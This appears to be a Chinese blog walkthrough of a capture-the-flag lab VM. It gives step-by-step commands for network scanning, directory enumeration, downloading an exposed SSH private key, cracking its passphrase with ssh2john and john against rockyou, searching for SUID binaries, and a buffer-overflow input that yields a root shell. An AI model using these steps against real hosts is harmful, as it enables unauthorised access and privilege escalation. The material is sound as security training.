SSH私钥泄漏

(本机ip地址192.168.95.141)

第一步  扫描ip地址

netdiscover -r 192.168.95.1/24

 

判断分析出192.168.95.139为靶场ip地址

****也可以使用nmap进行扫描*****

****nmap -sP 192.168.95.1/24****

第二步 识别靶场的相关信息

使用nmap对靶场操作系统服务及版本号进行识别

nmap -sV 192.168.95.139

扫描到靶场中有特殊端口31337,此时使用浏览器进入端口

进入后发现没有什么用;

查看源代码

也没有什么可用的信息

第三部通过kali终端使用命令打开端口

使用命令

dirb http://192.168.95.139:31337/

 

发现文件robots.txt

使用浏览器打开(http://192.168.95.139:31337/robots.txt)

发现taxes文件

进入taxes文件(http://192.168.95.139:31337/taxes)

 得到flag1

第四部

使用命令进入ssh

http://192.168.95.139:31337/.ssh

将图中三个文件下载下来,这里给大家一个示范

下载好了三个文件后,可以在这里找到

可以把它们拖到桌面上方便后续操作

使用cd Desktop进入桌面

在使用ll查看文件权限

注明:我这里文件已经给了权限,有些没给权限的后面没法操作

可以使用  chmod 777 id_rsa 给与权限

在使用ll查看

点击桌面authorized文件可以得到用户名称:simon

 使用命令 :ssh -i id_rsa simon@192.168.95.139 进行登录

输入yes进行确认

此时我们没有密码

我们对得到的文件进行解密

locate ssh2john

/usr/share/john/ssh2john.py ssh2john id_rsa > rsacrack

利用字典进行解密

zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack

得到密码:starwars

再次尝试登录

登录成功,但我们还没有root权限

现在查找root权限文件

find / -perm -4000 2>/dev/null

发现read_message文件

 进入root,发现文件read_message.c文件

cat read_message.c打开文件得到flag2

 

read_message

 

输入SimonAAAAAAAAAAAAAAA/bin/sh(注释:前五个一定要写Simon‘s是大写’,后面随便写满15个)

(能力要求:代码审计,会代码的要看懂代码意思)

此时,以获得root权限

输入:cat flag.txt

并获得flag3

注意:1.注意命令大小写和空格

    2.查找到的用户名首字母有时候需要大写,有时候需要小写

3。实际操作过程中可能还存在路径问题,要注意自己在什么路径打开什么文件

可尝试使用cd来解决,解决不了就算了

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值